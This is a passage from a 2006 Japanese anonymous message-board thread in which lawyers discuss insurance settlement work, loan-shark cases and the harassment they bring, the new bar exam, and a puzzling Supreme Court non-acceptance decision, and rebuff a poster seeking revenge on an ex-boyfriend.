438 :無責任な名無しさん:2006/06/29(木) 14:07:15 ID:9wlvsRHN
>>437
いやだから弁護士費用を下げるために合格者を増やしたんだってば。

439 :無責任な名無しさん:2006/06/29(木) 14:13:49 ID:x/o3K87i
ロー卒の頭は少し弱いが、こわもてで押しのつようそうな奴を大量に採用して
損保示談代行専門の法律事務所を作って、複数の損保から安値で大量受注すればもうかるのでは?
誰か一緒にしないか?


440 :無責任な名無しさん:2006/06/29(木) 14:14:34 ID:SFLrcznk
俺はやらんが、損保の代理やってる同期は
最近損保の値下げ圧力がひどくて困る
とこぼしている。

441 :無責任な名無しさん:2006/06/29(木) 14:17:06 ID:FO7z8CRj
除名になった仙台の先生なんか向いてそう

442 :無責任な名無しさん:2006/06/29(木) 14:49:38 ID:x/o3K87i
損保の定年退職者を事務員として雇用すれば、営業も事務処理もさせることができるから
一石二鳥だな。損保も退職者の受け皿になるので喜ぶのでは?


443 :無責任な名無しさん:2006/06/29(木) 14:53:24 ID:dl/Xd6ni
>439
 損保の示談案件については、物損において双方に過失がある場合の、当方損害の回収も含む場合がある。
形式的には、事故の当事者からの依頼だから利益相反とはならないけど、実質は相手方保険会社との交渉となる。
多数の保険会社から依頼を受けていると、相手方の保険会社が、別件で依頼を受けている会社の場合に、実質的な利益相反は生じないか(或いは、職務の公正を疑われないか)が問題となります。

 あと、損保の仕事は性格上の向き不向きが大きいものです。損保の主事(中途採用、いわゆるキャリア社員とは異なる。)の入れ替わりは結構ありますけどね。
更に言えば、訴訟より示談のほうが数段難しいと思うので、ロー卒の弁護士も新米のうちは使えないと思う。

444 :無責任な名無しさん:2006/06/29(木) 16:20:02 ID:Pe5e9jet
そんなの前線でもまれたり、はしごをはずされたりして成長して行くんだよ。


445 :無責任な名無しさん:2006/06/29(木) 16:53:22 ID:pf8ObdtW
>>439
損保の数が減ってるから,複数の損保の顧問などをやると,すぐ利益相反になりそう。

東京海上の訴訟案件が少ないのは,東京海上同士の事故が多いからだとか。

446 :無責任な名無しさん:2006/06/29(木) 18:19:44 ID:x/o3K87i
でも、しょせん同業者間だから、なあなあの話し合いで決まるんじゃないの?

447 :無責任な名無しさん:2006/06/29(木) 18:37:58 ID:A4cH2ArX
ってか、弁特じゃなければ、あまり損保弁護士同士で訴訟ってないよな。
損保弁護士から被害者弁護士にジョブチェンジした場合はあるが、それは、損保弁護士vs元損保弁護士だしな。
にしても、被害者弁護士はおいしすぎる。定期的に客が来るならば。

損保には未練はないが、被害者側はやってみたい。

448 :無責任な名無しさん:2006/06/29(木) 18:51:40 ID:0+kQ2lPm
損保の案件をやってて,自賠基準の賠償金を提示して示談したのに,
被害者(素人)から,「先生のおかげでたくさんいだだき,
ありがとうございます。」などと感謝されるときがあり,
心が痛む。

まあ,人に自慢できる仕事ではないな。

449 :無責任な名無しさん:2006/06/29(木) 19:29:27 ID:PQpEYJN/
それは心が痛むなぁ・・・

450 :無責任な名無しさん:2006/06/29(木) 19:46:59 ID:pN6arxTY
弁護士ドット混むからファックス北w

451 :無責任な名無しさん:2006/06/29(木) 20:05:22 ID:k7GvRtst
>>450
何それw 詳しく

452 :無責任な名無しさん:2006/06/29(木) 20:05:50 ID:4pSGHlDV
>>448
ホンマカイナ。
まー、弁護士は公正な紳士だと勘違いしている人が、
この日本では、まだまだ多いからね。
アンタが、このような誤解をといて、弁護士は詐欺師の代名詞と評価される
先鞭を担ってくれて、ありがとう。      クスン・・

損保会社の社員でも、まともな会社・人間なら、このようなときには、
「いや、私の裁量で会社に言ってこれくらい上積みさせました」と、
ごまかしても、任意基準での支払いをしているよ。
損保に対しては、財務省の監査があることを知らない、素人弁護士サンですか。
それとも、悪名高い損保●●のお雇い弁護士さんですか。 

>>東京海上の訴訟案件が少ないのは,東京海上同士の事故が多いからだとか。
ウン、そういう面もあるだろうが、東海は、払うべきもは払い、払うべきでないものは払わんと、
きっちり調査、判定をしている面もあるのでは。
東海相手の被害者からの相談を受けて、訴訟でやれば勝てるだろうと予想できた案件は、
今までなかった。

これに反して、損保●●はひどい対応で、しかも穴だらけ、
ウソで被害者を丸め込もうとしていることも珍しくない。
(以前、4b巾の道路から出た出会い頭事故で、
「被害者は路地から飛び出してきた」という調査報告書を見たことがある。)
だから、訴訟を打てば、まずは大幅な増額請求が見込めるから、
被害者側の弁護士としては、勝ってたんまり報酬を貰えた上で、
依頼者からは感謝される、ありがたい相手方=お客様です。



453 :無責任な名無しさん:2006/06/29(木) 20:10:44 ID:pN6arxTY
>>451
無料化したとのこと。弁護士法72条の問題もなくなったんだってw

454 :無責任な名無しさん:2006/06/29(木) 20:13:36 ID:Frfflepr
それって、やっぱり違法だったって事じゃんw

455 :無責任な名無しさん:2006/06/29(木) 20:16:33 ID:4pSGHlDV
余計なことかも知れんが、損保●●のお雇い弁護士には、
すでに死亡していた加害者の委任状を付けて答弁書を出し、
延々口頭弁論1年後、被告本人尋問の証拠調べ期日を決めるときに、
いけシャーシャーと裁判官に「本人はすでに死亡しておりましたので、
申し出は取り下げます」って言ったヤツがいたよ。

456 :無責任な名無しさん:2006/06/29(木) 20:23:49 ID:dl/Xd6ni
>452
 非弁さんと思われますが、TN社は、裁判となって、弁護士に金を払い、或いは、判決まで行って弁護士費用と遅延損害金を上乗せされるのであれば、多少の上積みをしても示談したほうが合理的との方針でやっている側面が大きいと思われます。
そんなに甘い会社ではありませんよ。
 ちなみに、旧Y社と〇クシー共済が渋いのはそのとおりだと思いますが。

457 :無責任な無責任:2006/06/29(木) 21:16:36 ID:um/qJS72
 TN社の示談案でも、地場委帰順のものは、拓酸あったよ。

458 :無責任な名無しさん:2006/06/29(木) 21:28:29 ID:t3F/joyG
さて、皆様のところに60期は来ましたか?
どんな感じ?
まあ60期といえどもできる奴はできるんだろうな。

459 :無責任な名無しさん:2006/06/29(木) 23:18:09 ID:Am0mDzZD
何期だろうが、傍聴人に向かって行き成り暴言を吐く顧問弁護士よりはマシだろう。
昨年の12/28、口頭弁論でしたUFJの顧問弁護士様な奴よりはな。


460 :無責任な名無しさん:2006/06/29(木) 23:26:59 ID:OOhxIBMB
40期代でも,ブログや準備書面で匿名や相手方を「愚か者」「卑怯者」「臆病者」と罵倒する企業法務系弁護士がいますぞ。

461 :無責任な名無しさん:2006/06/30(金) 00:36:14 ID:mnWh+uhL
組織犯罪処罰法違反容疑で弁護士逮捕 被告と共謀、違法収益隠匿
http://www.sankei.co.jp/news/060629/sha080.htm

バカラ賭博事件で被告の弁護を務めた埼玉弁護士会所属の弁護士が、
被告と共謀して店の違法な収益を裁判所の没収から免れようとしたとして、
埼玉県警とさいたま地検は29日、組織犯罪処罰法違反(犯罪収益等の隠匿
未遂)の疑いで、さいたま市南区の弁護士、岡田滋容疑者(59)、同区の無職、
宇高泰被告(53)=同罪で公判中=ら男3人を逮捕した。

調べでは、岡田容疑者らは今年1月初旬ごろ、宇高容疑者が実質上経営
していた賭博店(同県川口市)の違法な売上金約600万円について、裁判所の
差し押さえから逃れるため、店に架空の債務があるように装い、東京地裁に
債権差押命令を発令させるなどした疑い。

調べに対し、岡田容疑者は「店の債務は架空ではない」と容疑を否認。宇高
容疑者らは「具体的な計画は岡田容疑者の指示を受けた」と供述している。

岡田容疑者は平成11年の桶川ストーカー殺人事件の主犯格の男の弁護など
を担当した。

弁護妨害の悪寒

462 :無責任な名無しさん:2006/06/30(金) 07:39:12 ID:cUP/643i
弁護士特約付だと、自腹では絶対にやらないような訴訟が多いので心が痛む...
50000円の物損で1割の過失を争うとか...
どうみても依頼者の方の過失が8〜9割とか...

まぁ、これが法の支配の実現つーやつでしょうかね。

463 :無責任な名無しさん:2006/06/30(金) 09:20:35 ID:0Xijj6/n
>462
そういうケースで訴えられたのがあったよ。
こちら修理代金10万、相手修理代金30万くらいで、基本の過失割合が
当方:相手=2:8。修正要素があって1:9と損保担当者が相手の損保と
交渉していたら、相手は過失割合が気に入らない、せめて3:7だろうと
言って弁護士特約使って訴えてきました。
こちらも仕方ないので応戦。
でもそんな数万程度の争いのために、弁護士費用をそれ以上にかけることに
なるんだもんな。バカバカしい。
弁護士特約って、免責金額ないんだろうか?


464 :無責任な名無しさん:2006/06/30(金) 09:59:42 ID:hQgmhDNO
>>448
まあ、弁護士対応ってことはそれなりに長期化していたんだろ?
任意基準よりはUPでいいんじゃないの?
ほとんどは任意基準で終わってるんだし。

465 :無責任な名無しさん:2006/06/30(金) 10:32:34 ID:hQgmhDNO
>>456
それ同意。
T海N動は、もっとも弁護報酬を渋ってくるところ。
いい客はJ。
被害者が加害者に直接電話したとか、そんな程度ですぐ依頼してくれるし。
よく話を聞くと、SCの口の利き方が悪くて相手を怒らせた等のミスの尻拭い的な依頼が多く、相手の怒りをなだめたらあとは簡単案件ということが多い。

466 :無責任な名無しさん:2006/06/30(金) 13:49:26 ID:QPLfd++a
>>456
おれも非弁っぽいっておもった


467 :無責任な名無しさん:2006/06/30(金) 15:33:26 ID:zjX841H7
>損保会社の社員でも、まともな会社・人間なら、このようなときには、
>「いや、私の裁量で会社に言ってこれくらい上積みさせました」と、
>ごまかしても、任意基準での支払いをしているよ。

弁護士のセリフとしては変ですよね。


468 :無責任な名無しさん:2006/06/30(金) 15:53:18 ID:tdenS7Rr
>>456
俺も参加しよう。「訴訟を打つ」なんて下品な言葉は弁護士は使いません。

469 :無責任な名無しさん:2006/06/30(金) 19:50:23 ID:cUP/643i
昔の弁護士 地元名門企業が顧問先 損保蔑視
一昔前の弁護士 損保が顧問先 クレサラ専業は蔑視
50期くらいの弁護士 クレサラ中心・外資系損保が顧問 闇金蔑視
将来の弁護士 ***な顧問先 事件屋の手先


470 :無責任な名無しさん:2006/06/30(金) 21:18:06 ID:FkodnhOX
そうか,俺は一昔前の弁護士なのか。

471 :MS754 ◆yGUnQdhyV2 :2006/06/30(金) 21:36:51 ID:Lh1MnB8A
本日の果物

マンゴー  3個

累計

メロン 6個  サクランボ 2パック(佐藤錦)  マンゴー 3個

>>469
私は、どこにもあてはまらないです。


472 :無責任な名無しさん:2006/06/30(金) 22:24:30 ID:yyC1sv+K
>>469
ヤミ金を蔑視しない弁護士なんているのか。

473 :無責任な名無しさん:2006/06/30(金) 23:32:31 ID:U+C5LVGw
>>472
怯えて電話対応できない弁護士ならいる。
ここだけの話、鮨やピザ、花が届きすぎて恐怖を覚えたのだろう。

474 :無責任な名無しさん:2006/07/01(土) 01:50:07 ID:Mnhg3ae1
>>473
情けねー。
うちなんか、そば屋が笑いながら、「せんせー、また電話あったけど注文した?」って
電話かけてくるようになったよ。

475 :無責任な名無しさん:2006/07/01(土) 08:23:36 ID:9SvKA0dQ
>473
寿司やピザが届いたって、何も怖くないよ。
そもそもこちらは注文していないし。
最近は全然ないけど、3年くらい前には何回かピザが届いたな。
1回に5枚も持ってきたこともあった。
でも全部帰ってもらって終了。


476 :無責任な名無しさん:2006/07/01(土) 21:53:34 ID:ZfpDBSTy
ビザ屋ならいいけど、寿司屋だと何となく寿司屋の主人に悪いなーっておもう。
ただ、一回目は出してやるけど、次回からは法律事務所の依頼の時は事務所へ確認の折り返し電話をするように伝えた。

477 :無責任な名無しさん:2006/07/01(土) 23:09:19 ID:CDSH2ucY
もーーー駄目。

今依頼してる弁護士さん大好きすぎ。
超やりたい。
でも親子ほど年が離れてて、子ども扱いで相手にしてもらえない。
嫌われてはないとは思うんだけど。

あーー毎日悶々としてしまう。

478 :無責任な名無しさん:2006/07/02(日) 00:00:02 ID:3VWezA4P
>>477
ネタ乙

479 :無責任な名無しさん:2006/07/02(日) 02:41:13 ID:RKeqaWtk
ホントですよ…。

480 :無責任な名無しさん:2006/07/02(日) 05:34:29 ID:hBE5a7A4
周りに迷惑をかける系の嫌がらせは困るね。

裁判所に事務所名を名乗って電話をかけて暴言を吐かれるとか。
周りの事務所にFAXが送りつけられるとか。
架空の110番通報をされるとか。


481 :無責任な名無しさん:2006/07/02(日) 09:32:11 ID:HT3TOeVU
>>480
こっちの愚痴を書いちゃまずいでしょ。
てか、9割9分の弁護士はそんなの慣れているから何も感じません。
そんなのでアタフタするのは弁護士になって2ヶ月ぐらいまでの新人だけ。

482 :無責任な名無しさん:2006/07/02(日) 11:21:37 ID:a1LULwp+
注文を間違えて、多く作ってしまった寿司屋は、
とりあえずそれを法律事務所にもっていく、という手があるんだね。

483 :無責任な名無しさん:2006/07/02(日) 11:54:35 ID:7xULopr/
>>480
皆さん,なんでそんなに嫌がらせを受けるんですか?
うちも結構ヤミ金とかの事件やってますが,そんなこと受けたことない。
最初から罵倒して人間扱いしてないんですか?

484 :無責任な名無しさん:2006/07/02(日) 12:12:42 ID:vcz4y3dt
してないよ。ヤミ金は一般に強気に出た方が結果がいい(金返してくる)。

485 :無責任な名無しさん:2006/07/02(日) 12:21:42 ID:LXdsSI+6
闇金に「それ恐喝じゃないですか。弁護士がそんなことして良いんですか」
と言われたことがあった
「警察行けば」
と応えてあげた

最近やみきんやってないな

486 :無責任な名無しさん:2006/07/02(日) 15:12:27 ID:CVvZpr2W
金利引き下げでもうすぐ闇金激増するヨ

487 :無責任な名無しさん:2006/07/02(日) 16:23:45 ID:HOEyTq8k
>>486
業者乙

488 :無責任な名無しさん:2006/07/02(日) 21:11:51 ID:hBE5a7A4
闇金のほうが対処しやすい。
明確な犯罪だからな。

489 :無責任な名無しさん:2006/07/02(日) 21:32:10 ID:WuWXlMIE
不法原因給付だから計算も不要だしな。


490 :無責任な名無しさん:2006/07/02(日) 23:32:02 ID:Kh64TzKH
松山かなんかの五菱会の判決では差額説取ったらしいからそうともいえないかもよ

491 :無責任な名無しさん:2006/07/03(月) 01:27:29 ID:kJEO4sWF
ここは闇金相手の弁護士ばかりいるレベルの低いスレですね。

492 :無責任な名無しさん:2006/07/03(月) 01:30:00 ID:TBpg+6zr
>>491
あんたも10件くらいは分担しな

493 :無責任な名無しさん:2006/07/03(月) 10:32:03 ID:tsx55osN
>>486
規制金利引き下げ→ヤミ金激増、は間違いないだろ。
だって、どこからも借りれない人がたくさん出てくる。そういう人はそもそも返済能力がないから
お金を借りること自体が間違い。生活水準を下げて、生活を改めねばならないのだが、人の欲望は抑えきれん。
物欲食欲性欲名誉欲にとりつかれてお金を借りたい人がたくさんいて、一方でお金を貸して儲けたい人がいるわけだから
ヤミ金が激増するに決まっている。
「被害者」救済のため、国営の低利消費者金融を作りますか? あるいは生活水準を下げないDQNを教育するため
収容所でも作りますか?

494 :無責任な名無しさん:2006/07/03(月) 10:54:40 ID:skQowlXy
>>491はサラ金に雇われたボロ弁護士

495 :無責任な名無しさん:2006/07/03(月) 11:08:31 ID:skQowlXy
>>493
乞食させりゃあいいと思うよ。
どっちにしろ,ノミ屋と同じく,使うだけ使ってせっぱ詰まったら警察に駆け込めば終了
で良いんじゃない。

ヤミ金は儲からないと思ったら,だれもヤミ金をやらないよ。
警察がちゃんと対応したら良いよ。

496 :無責任な名無しさん:2006/07/03(月) 11:37:19 ID:pqk2keiz
>>493
今の高金利だと破綻してヤミ金に手を出さざるを得なくなるけど、
利率が下がることで、ヤミ金に手を出さずにすむ人の存在は無視
ですか?

497 :無責任な名無しさん:2006/07/03(月) 11:38:54 ID:QeRzr/dT
>>496

ヒント:絶対数

498 :無責任な名無しさん:2006/07/03(月) 15:25:42 ID:Lz1uxb6G
皆さん、ヤミ金の事件の依頼が飛び込みで来たとき、引き受けているんですか?自分は引き受けたくないけれど、むげに断るのも可哀想なので弁護士として看板掲げている以上全部断ることはしないで、場合によって引き受けたり、断ったりだけど。

499 :無責任な名無しさん:2006/07/03(月) 15:46:25 ID:psOU0qq0
闇金は怖くはないが鬱陶しい。
できるだけ受けないようにしている。
事務員も受けたら迷惑だろう。

500 :無責任な名無しさん:2006/07/03(月) 15:47:01 ID:pqk2keiz
判時1928号の「最高裁の裁判官が上告受理しない決定をしたのが
違憲違法国賠請求」。見出しだけ見たら、どんなDQNが起こしたもの
かと思ったけど、内容読んだら、そりゃあこの弁護士さん怒るわな。
3億円の勝訴事件がパアだもん。おれでも一か八か起こすかもしれん。

501 :無責任な名無しさん:2006/07/03(月) 22:50:42 ID:9pzPi90F

手元(自宅)に判時ないから聞くけど、ネット上にその判決ある?

502 :無責任な名無しさん:2006/07/04(火) 09:33:19 ID:qEUs9lKQ
医師法には,第十九条 診療に従事する医師は、診察治療の求があつた場合には、正当な事由がなければ、
これを拒んではならない(以下略)とある。
しかし,弁護士法にはこれに類する規定はない。なぜなんでしょ・・・。


503 :無責任な名無しさん:2006/07/04(火) 11:14:10 ID:2EQ0dtd8
???
日本は弁護士強制じゃないし,報酬の支払を確実にしてくれる
保険制度もない。
なんで,義務的に受任しなきゃならないの?
馬鹿か??

504 :無責任な名無しさん:2006/07/04(火) 11:19:51 ID:tgbtiTG7
>502
非弁乙ハケーン

505 :無責任な名無しさん:2006/07/04(火) 11:35:50 ID:5GeFwiMD
暇なので(苦笑)、調べてしまった。

司法書士法
(依頼に応ずる義務)
第21条 司法書士は、正当な事由がある場合でなければ依頼(簡裁訴訟代理等関係業務に関するものを除く。)を拒むことができない。

行政書士法
(依頼に応ずる職務)
第11条 行政書士は、正当な事由がある場合でなければ、依頼を拒むことができない。

社会保険労務士法
(依頼に応ずる義務)
第20条 開業社会保険労務士は、正当な理由がある場合でなければ、依頼(あつせん代理に関するものを除く。)を拒んではならない。

税理士、弁理士、公認会計士はこの様な規定はない。

506 :無責任な名無しさん:2006/07/04(火) 12:40:11 ID:cJbZPfjs
日本は行政書士強制じゃないし、
報酬の支払いを確実にしてくれる保険制度もない。
なんで、義務的に受任しなきゃならないの?

507 :無責任な名無しさん:2006/07/04(火) 13:03:24 ID:liKSA0qy
仕事の内容がある程度決まってるからじゃない?


508 :無責任な名無しさん:2006/07/04(火) 13:59:06 ID:tgbtiTG7
試験の難易度に見事に対応しているね。
司法書士、行政書士、社労士→簡単。だれでも合格できる
弁護士、公認会計士、弁理士、税理士→超難関の国家資格

509 :無責任な名無しさん:2006/07/04(火) 14:12:03 ID:agPNzFH1
補足
新司法試験→簡単。だれでも合格できる


510 :無責任な名無しさん:2006/07/04(火) 14:19:46 ID:zjO08QZj
>>509
合格率はともかく,問題は難しいぞ
昨日始めてみたけど全然できない....

511 :無責任な名無しさん:2006/07/04(火) 14:23:41 ID:UypI/6kp
>>510
おっしゃるとおり,問題がいかに難しくても,最初から半分通るのがわかってる試験です。
問題の難しさに意味はありません。


512 :無責任な名無しさん:2006/07/04(火) 14:46:25 ID:woArRrMb
新司法試験の受験生はうらやましいな。

513 :無責任な名無しさん:2006/07/04(火) 15:16:19 ID:agPNzFH1
きっとちゃんとした日本語が書いてあれば合格するぐらいのレベルだと思うよ。

514 :無責任な名無しさん:2006/07/04(火) 15:51:48 ID:wqbn0N7S
弁護士は,官公署,弁護士会,日弁連に対してのみ,消極的応召義務を負っています。

第二十四条
 弁護士は、正当の理由がなければ、法令により官公署の委嘱した事項及び会則の定めるところにより所属弁護士会又は日本弁護士連合会の指定した事項を行うことを辞することができない。


515 :無責任な名無しさん:2006/07/04(火) 19:11:20 ID:vYQROfJN
>>501
元の事件:3億円の火災保険金請求

高裁判決→発生した火災が偶発的な災害であることの主張立証責任は、本件契約
の約款にもとづいて保険金を請求する者が負う。請求者敗訴。

最高裁第二小法廷→平成16年5月28日不受理決定

平成16年12月13日最高裁第二小法廷判決。同じ約款に基づく保険金請求に
ついて、「火災保険金の支払いを請求する者は、火災発生が偶然のものであるこ
とを主張、立証すべき責任を負わない」。

516 :無責任な名無しさん:2006/07/04(火) 19:31:58 ID:WrcP13Ph
うわっ、そりゃ(両事件の事実関係はさておき)最高裁に何か言わんと気が済まんやろ

517 :無責任な名無しさん:2006/07/04(火) 19:50:32 ID:UypI/6kp
>>515
間違ってるよ。
読み直しなさい。

518 :無責任な名無しさん:2006/07/04(火) 19:56:04 ID:h7KkwMeu
しかしなぁ、裁判官は何時法律解釈を変えてもいいわけだからなぁ・・・

519 :無責任な名無しさん:2006/07/04(火) 20:16:24 ID:5FdF/vLF
平成16年5月から11月までの間に,法律解釈に影響を及ぼす社会情勢の変化があったんでしょう・・・・

520 :無責任な名無しさん:2006/07/04(火) 20:36:24 ID:MLBBReiX
民事事案の訴状がきて、当然敗訴することがわかりきってる事案で
受けてくれる弁護士っているのでしょうか。
もし受けてくれる場合は報酬如何になるのでしょうか。

521 :無責任な名無しさん:2006/07/04(火) 21:32:17 ID:JgVd4mN7
何をもって分かりきってるというのかにもよるけど。
きちんろお金をもらえるのならいいけど、あとで、
どうせ敗訴する事案なのにとかいって費用について
もめそうで嫌。

522 :MS754 ◆yGUnQdhyV2 :2006/07/04(火) 22:16:38 ID:zwtk1ovY
本日の果物

ミカン 1箱(15s)

累計

メロン 6個  サクランボ 2パック(佐藤錦)  マンゴー 3個
ミカン 1箱(15s)

>>517
どこが間違っているか教えて下さい。

523 :無責任な名無しさん:2006/07/04(火) 22:17:06 ID:UypI/6kp
負け方が変わるかも知れない事案なら受けます
どうしようもない事案なら受けません

524 :無責任な名無しさん:2006/07/04(火) 22:21:25 ID:UypI/6kp
>>522
俺が,平成16年12月13日最判の弁護士が国賠をおこした
と読み違って間違えていました。
5月28日に不受理食らった弁護士が国賠したんですな。

お騒がせしてごめんなさい。

さくらんぼは協同組合の奴ですね。


525 :無責任な名無しさん:2006/07/04(火) 23:32:27 ID:5FdF/vLF

発見した!

【和菓子】弁護士MSと雑談するスレ【大好き】
http://life7.2ch.net/test/read.cgi/debt/1146429117/

526 :無責任な名無しさん:2006/07/04(火) 23:35:28 ID:5FdF/vLF
借入金300万円の一括払を請求されていた被告の代理人として(請求自体には何ら反論のネタなし),示談で30万の10回払いにまとめたときの報酬って,計算しにくいね。

私は,そういう事件は,着手金21万,報酬は「分割払いにできたら10万円」とかで受けてますが・・・

527 :無責任な名無しさん:2006/07/05(水) 12:12:17 ID:4Yjr2nNl
弁護士どっと混むは、半期ごとに貸借対照表と損益決算書をネットで公開
すると約束していたくせに、全然公開しねえな。興味津々で待ってのにな。

528 :無責任な名無しさん:2006/07/05(水) 13:09:53 ID:dC26qewU
>>500
田舎弁護士の弁護日誌(四国・愛媛)
http://shimanami.way-nifty.com/report/2006/07/post_8065.html
2006年7月 5日 (水) これってどうなの?

 同じ最高裁第2小法廷なのに??? 

 弁護士X先生は、A社から、「なぜ上告が受理しなかったのか、
上告が受理されるとだまして事件を受任したのか」と、非難され、
顧問契約も破棄され、大変な苦痛を受けているようです。

 そこで、弁護士X先生は、自身が原告となって、裁判所(国)に
対して、損害賠償請求を提訴しました。

 岐阜地裁は、いかなる事件を上告することを許容するかは立法
裁量として、上告受理義務を否定して、請求を棄却しました(判例
時報NO1928・平成18年7月1日号)。つれないですね。

 なぜ、最高裁は、上告を受理してくれなかったのか、不思議です。
同様の別事件が係属していたのなら、なおさらです。

 これからの弁護士は、依頼者に説明するときは、極めて慎重な
アドバイスに終始しないと、失敗に終わった際に、大変なことにな
る可能性があります。



529 :無責任な名無しさん:2006/07/05(水) 13:12:39 ID:CilNNOjp
しかし、判時らしい裁判例セレクションですねw
判時は弁護士向け雑誌、判タは裁判官向け雑誌

530 :無責任な名無しさん:2006/07/05(水) 13:37:41 ID:Ojis12Vc
>528
 ありうる可能性としては、上告不受理の事例は、立証責任を転換しても1審原告が負けるという判断が背後にあったということでしょうかね。

531 :無責任な名無しさん:2006/07/05(水) 15:15:57 ID:OlM46H7y
>>530
判時によると、一審は、請求者は偶発的な災害であることの主張立証責任を
負わないとして、請求者(件の弁護士の依頼者)を勝訴させてるようですから、
立証責任を転換してたら1審原告が負けるということはない事例だったと思わ
れます。

どう考えても、最高裁のミスだよなあ。ミスを指摘されるとそれは裁量の範囲内
だと突っぱねるところなんか、結局裁判所も単なるお役所なのねって感じです。

532 :無責任な名無しさん:2006/07/05(水) 15:33:29 ID:4Yjr2nNl
仮に、ミスであったとしても、裁量権逸脱で違法ということにはならんだろう。

533 :無責任な名無しさん:2006/07/05(水) 15:51:23 ID:OlM46H7y
自分の裁量の範囲内を自分で決めることをお役所ってところはおかしいと思わない
ところですからね。事実、岐阜地裁も逸脱はないっていってますし。

裁判所が裁量の範囲内だっていう認定をするであろうことは前提として、それが正し
いのかっていう話だと思いますよ。

534 :無責任な名無しさん:2006/07/05(水) 16:06:51 ID:xOr0/3rK
ま,再審でもしてみたらどうだろう

535 :無責任な名無しさん:2006/07/05(水) 18:16:58 ID:0Y5Ih8tx
相談させて下さい。元彼が弁護士で、その人は私によく契約書
とか見せてくれました。喧嘩別れしたので、
「あの時のこと、会社にちくるよ!」
って言ったら逆切れして、脅迫で訴えてやる。と言われました。
実際には立ち場的に訴えてはこないと思うんですけど、
会社に悪口とか言ったら、相手は私だってばれますか?
もし、彼がそのせいで職を失ったとしたら、
民事で訴えられたりするんでしょうか?

でも、契約書見せたりするのにって罪なのに・・・

536 :無責任な名無しさん:2006/07/05(水) 18:29:16 ID:8fzu/KN1
>>535
ネタ乙
面白いね



537 :無責任な名無しさん:2006/07/05(水) 18:31:15 ID:4Yjr2nNl
江戸の仇を長崎でか・・・豚でもない女だな


538 :無責任な名無しさん:2006/07/05(水) 18:31:29 ID:l2G2c5/h
>>525
トリが違うようだが。それだけ晒してはかわいそうだよ。
↓ここのスレ主のようだね。こっちも晒さないと。
http://life7.2ch.net/test/read.cgi/debt/1151108635/

539 :535:2006/07/05(水) 18:32:44 ID:0Y5Ih8tx
いや、ネタじゃないですw
真面目に彼に事務所を首になるくらいになってもらいたいので
本音の弁護士さんの意見を聞きたくて・・・
個人的な例を出して人事の人にメ−ルして、それを彼に見せら
れたら私だってばれて、今度は民事で名誉毀損だって
訴えられちゃうかもしれないしw
しらを通そうとしても、彼に一度匂わせた事があるので、
何かあったら絶対に私だってばれちゃうし・・・

弁護士の先生の生の意見を良かったら聞かせて下さい〜!

540 :無責任な名無しさん:2006/07/05(水) 18:43:58 ID:4Yjr2nNl
お前も背任罪と秘密漏泄罪の共犯で元彼と仲良く逮捕されたうえ、更に脅迫罪がついて懲役3年刑務所に入ります。

541 :無責任な名無しさん:2006/07/05(水) 19:38:52 ID:By0wwSpF
>>539
あまり食いつきよさそうなネタじゃないな。

542 :無責任な名無しさん:2006/07/05(水) 20:19:57 ID:guhdsIPb
ぶりかえすようだけれども
調査官に上告受理させなければというモチベーションを抱かせるような
上告受理申立書を書くことができなかったということだよね

543 :無責任な名無しさん:2006/07/05(水) 20:48:21 ID:OlM46H7y
今調べたら、あとの判決の事案の原判決の言い渡し、平成16年03月04日だった。
http://www.courts.go.jp/search/jhsp0030?action_id=dspDetail&hanreiSrchKbn=01&hanreiNo=25084&hanreiKbn=01

不受理決定がされた平成16年05月28日だと、記録が最高裁に届いてないかも知れんな
(控訴期間+通知書送付までの期間+50の理由書提出期間+送付の期間)。

すると上告受理申立理由の差か?しかし、記録届いてから数か月で判決ってえらく早いな。
おれ、1年半くらい待たされて結局不受理だったなんてのもあったぞ。

544 :無責任な名無しさん:2006/07/05(水) 21:13:25 ID:BUESSTZF
判時がまだ届いてないんですが,憲法14条違反も請求原因に挙げてますか?

545 :535:2006/07/05(水) 21:58:51 ID:0Y5Ih8tx
>>540さん

それはマジレスでしょうか?
ちなみに小さなネットカフェから、彼の会社の人事宛に
メ−ルしようと思っていたので、彼から「あいつだ!」
って訴えられない限り犯人は私だってわからないと思います。
それでしらってきれないでしょうか・・・

>>541さん

ネタじゃなく真面目な相談なので食い付いてきて下さいw
っていうか、相談にのって下さい〜

546 :無責任な名無しさん:2006/07/05(水) 23:05:53 ID:nU6qyIvp
ふざけんな、カス!
着手金50万持って、事務所に来い!


547 :無責任な名無しさん:2006/07/05(水) 23:26:05 ID:xyLVO5+O
いや,いくら積まれてもお引き取り願う。

548 :無責任な名無しさん:2006/07/05(水) 23:38:32 ID:ZmSAj+4e
というか、ここは相談スレではない。

やさしい法律相談part181
http://school5.2ch.net/test/read.cgi/shikaku/1152110045/

549 :無責任な名無しさん:2006/07/06(木) 00:18:13 ID:VcnpoLhS
呆テラスができたら、こういうDQNがわんさか来るのかな

550 :無責任な名無しさん:2006/07/06(木) 00:21:49 ID:2HpTOgZy
>535
 では、マジレスしてあげよう。
 何ゆえ、あなたの元彼に対する、法的な正当性や必要性に乏しく、かつ、社会的にみても相当とは考え難い意趣返しについて、相談料も受け取らずに弁護士が職務経験を経て養った知識と経験に基づいてアドバイスしてあげなければならないのか。
その点を考えてください。

551 :無責任な名無しさん:2006/07/06(木) 00:40:14 ID:duojRN9k
>>550
回答は完璧なんだが,スレを上げないでくれ。

552 : ◆V0loDX3yoE :2006/07/06(木) 00:51:58 ID:uAvE5tjY
S

553 :無責任な名無しさん:2006/07/06(木) 10:08:54 ID:HhXL0ADG
>>544
あげてる。

554 :無責任な名無しさん:2006/07/06(木) 16:59:03 ID:HhXL0ADG
>>543
後の最高裁判決、上告棄却判決だな。
すると、あとの上告受理申立理由が優れていて判決になったというわけでもなさそう。
最高裁判決の原判決の理由付けが説得的だったのか。
でも、原判決の出た後に、上告不受理決定が出てるよな。

第二小法廷、何がなんだかわかんねーぞ。

555 :無責任な名無しさん:2006/07/06(木) 20:40:41 ID:TAUlVjJi
純粋なミスだとして法的救済はないのか?

556 : ◆GamblerZoo :2006/07/06(木) 22:33:57 ID:cloG6FbZ
源氏物語

557 :無責任な名無しさん:2006/07/07(金) 05:18:34 ID:2GBA7di+
弁護士会に電話して相談してみろ

558 :無責任な名無しさん:2006/07/07(金) 05:19:04 ID:2GBA7di+
sage

559 :無責任な名無しさん:2006/07/07(金) 12:19:46 ID:BnJvUUfW
ロースクールの見事なクオリティー

610 名前:氏名黙秘[sage] 投稿日:2006/07/07(金) 10:24:11 ID:???
旧で国賠の要件なんて書く必要ねーだろ。
行政法ないんだからw
初学者丸出しだなwww
それで旧残留とかいってんのかwwwwww

